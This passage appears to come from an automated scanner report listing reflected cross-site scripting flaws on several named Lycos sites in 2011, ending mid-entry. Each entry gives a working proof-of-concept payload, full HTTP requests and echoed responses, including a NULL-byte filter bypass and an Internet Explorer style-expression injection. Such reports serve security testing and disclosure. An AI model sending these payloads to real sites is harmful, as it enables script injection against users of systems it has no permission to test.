The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007ffaf"><script>alert(1)</script>1459be4bf30 was submitted in the REST URL parameter 2. This input was echoed as 7ffaf"><script>alert(1)</script>1459be4bf30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /vehicle-car/2008-ford-40k-miles-2416144596%007ffaf"><script>alert(1)</script>1459be4bf30 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:49 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car/2008-ford-40k-miles-2416144596%007ffaf"><script>alert(1)</script>1459be4bf30?mobile=1" rel="nofollow"> ...[SNIP]...
1.238. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-car/2008-ford-40k-miles-2416144596
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1da9"><script>alert(1)</script>abf23606d77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car/2008-ford-40k-miles-2416144596?c1da9"><script>alert(1)</script>abf23606d77=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:25 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar; path=/ Set-Cookie: classifieds[lastpage][0][name]=Cars; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car/2008-ford-40k-miles-2416144596?c1da9"><script>alert(1)</script>abf23606d77=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f957e"><script>alert(1)</script>e606bae3932 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-motorcyclef957e"><script>alert(1)</script>e606bae3932/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:18 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-motorcyclef957e"><script>alert(1)</script>e606bae3932/?mobile=1" rel="nofollow"> ...[SNIP]...
1.240. http://classifieds.lycos.com/vehicle-motorcycle/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-motorcycle/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f418a"><script>alert(1)</script>8b2f5758549 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-motorcycle/?f418a"><script>alert(1)</script>8b2f5758549=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 81935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-motorcycle/?f418a"><script>alert(1)</script>8b2f5758549=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22cbd"><script>alert(1)</script>e56189542c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-parts22cbd"><script>alert(1)</script>e56189542c1/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:21 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-parts22cbd"><script>alert(1)</script>e56189542c1/?mobile=1" rel="nofollow"> ...[SNIP]...
1.242. http://classifieds.lycos.com/vehicle-parts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-parts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b38"><script>alert(1)</script>e3c05e93053 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-parts/?91b38"><script>alert(1)</script>e3c05e93053=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 83433
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-parts/?91b38"><script>alert(1)</script>e3c05e93053=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67f6"><script>alert(1)</script>5959bf12699 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehiclec67f6"><script>alert(1)</script>5959bf12699/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:22 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehiclec67f6"><script>alert(1)</script>5959bf12699/?mobile=1" rel="nofollow"> ...[SNIP]...
1.244. http://classifieds.lycos.com/vehicle/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abf83"><script>alert(1)</script>3bd7c3d9a6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle/?abf83"><script>alert(1)</script>3bd7c3d9a6c=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:36 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 96135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle/?abf83"><script>alert(1)</script>3bd7c3d9a6c=1&mobile=1" rel="nofollow"> ...[SNIP]...
1.245. http://classifieds.lycos.com.au/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com.au
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eeb5"><script>alert(1)</script>33f3545c70b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?6eeb5"><script>alert(1)</script>33f3545c70b=1 HTTP/1.1 Host: classifieds.lycos.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:20:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?6eeb5"><script>alert(1)</script>33f3545c70b=1&mobile=1" rel="nofollow"> ...[SNIP]...
1.246. http://classifieds.lycos.in/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.in
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e577e"><script>alert(1)</script>5bdc50df2f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e577e"><script>alert(1)</script>5bdc50df2f3=1 HTTP/1.1 Host: classifieds.lycos.in Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:20:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:15 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?e577e"><script>alert(1)</script>5bdc50df2f3=1&mobile=1" rel="nofollow"> ...[SNIP]...
1.247. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de73e"style%3d"x%3aexpression(alert(1))"be0d61fbb03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de73e"style="x:expression(alert(1))"be0d61fbb03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coupons?de73e"style%3d"x%3aexpression(alert(1))"be0d61fbb03=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:56:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:24 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43186
<title>Online Coupons, Shopping D ...[SNIP]... <a href="?pn=2&de73e"style="x:expression(alert(1))"be0d61fbb03=1"> ...[SNIP]...
1.248. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917e1"style%3d"x%3aexpression(alert(1))"f0d4418b1b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 917e1"style="x:expression(alert(1))"f0d4418b1b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals?917e1"style%3d"x%3aexpression(alert(1))"f0d4418b1b4=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:56:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:38 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76685
1.249. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/cameras-167
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91252"style%3d"x%3aexpression(alert(1))"512a2f2bd53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91252"style="x:expression(alert(1))"512a2f2bd53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/cameras-167?91252"style%3d"x%3aexpression(alert(1))"512a2f2bd53=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:33 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 77036
<title>Cameras Deals, Cameras Sal ...[SNIP]... <a href="?pn=2&91252"style="x:expression(alert(1))"512a2f2bd53=1"> ...[SNIP]...
1.250. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/clothing-and-accessories-202
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22927"style%3d"x%3aexpression(alert(1))"123f49753eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22927"style="x:expression(alert(1))"123f49753eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/clothing-and-accessories-202?22927"style%3d"x%3aexpression(alert(1))"123f49753eb=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:54:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:37 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76670
1.251. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/computer-39
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27454"style%3d"x%3aexpression(alert(1))"160b3153f7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27454"style="x:expression(alert(1))"160b3153f7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/computer-39?27454"style%3d"x%3aexpression(alert(1))"160b3153f7b=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:11 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 78985
1.252. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/digital-cameras-168
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f182"style%3d"x%3aexpression(alert(1))"c14e1873a38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f182"style="x:expression(alert(1))"c14e1873a38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/digital-cameras-168?9f182"style%3d"x%3aexpression(alert(1))"c14e1873a38=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
